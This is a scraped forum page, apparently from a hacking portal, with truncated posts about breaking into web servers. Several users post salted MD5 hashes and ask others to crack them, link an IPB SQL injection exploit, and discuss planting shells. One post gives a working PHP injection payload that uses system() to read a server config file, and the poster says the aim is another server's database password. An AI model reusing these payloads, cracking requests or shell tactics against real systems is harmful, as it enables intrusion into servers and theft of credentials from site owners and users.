 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 68
 Members: 0
 Total: 68
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
|
The exploit is released here:
http://de.crypt.in/threads/50-IPB-3.0.1-SQL-Injection-Exploit
There is also a slightly improved 2.3.5 exploit. |
|
|
|
|
Hey guys, can any of you crack this?
Hash: 8426975e370aab3bf9de8b2b8a637b04
Salt: &c.rl |
|
|
|
|
| You're not allowed to post websites... |
|
|
|
|
If you do this every lamer with brains will find your password for 5 min.Why?Very simple.access_log,stats ....etc and worse he find your shell.
They will find your shell anyway. The best thing to ... |
|
|
|
|
What PHP code are you executing?
I know this is a bit of spoonfeeding, but I don't think there's any other way to show you:
So the first thing you do is figure out if running system commands is ... |
|
|
|
|
Even though waraxe put some time into replying, he didn't touch every topic out there. This is why you should read up.
For example:
1) Whether you can write files depends on the permissions of the ... |
|
|
|
|
Calm down, folkses, you'll learn at your own pace.
I see nuker as someone who's trying to learn and is not just a skiddie.
As for help, PM me anytime. I don't usually read those, but now I will. |
|
|
|
|
No. You can read all files readable by the web server (source code), and you can upload files to directories chmodded to 777.
If upload is possible, you can also upload software and run it, which m ... |
|
|
|
|
This will work, but you need to scroll down to $i = 370 and manually change the 370 to whatever location you think the mask starts at.
I am working on automating that at the moment, till then, you ... |
|
|
|
|
Wow...I didn't even know it stored passwords like that.
I'll get on that for you and come up with a solution. |
|
|
|
|
c59d9a472c918bcbe8ed9d2dac288aa7:%Mt!Y
4435cdae4854b8554fd3d0e66025906a:O>#.[
0ae211b3fe51aaf22a1e555fce70abd9:Q>?{=
903359f388ab42a6b2f7ea6973e58f4b:10&cL
My dictionaries failed me ag ... |
|
|
|
|
Highest priority:
44f5e6aee89d4e9350c95ae4e6f88e41:<'6iI
Low priority:
6f2a78fbe6deaeda0315e26804ccc1b8:aVMM
4d57b2e28b051cf82daf4975ac21ebdb:wPqY]
5d701fb201304ed46b1003b815129013:zKn|A |
|
|
|
|
Here's what finally worked:
${${print $query='cat /home/***/***/config/servers.php'}}
${${system($query,$out)}}
${${print $out}}
And I spent so much time figuring it out...lolz. |
|
|
|
|
| Because the servers.php file is accessing a different database on a different server whose password I want... |
|
|
| Page 1 of 2 |
Goto page 1, 2Next
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
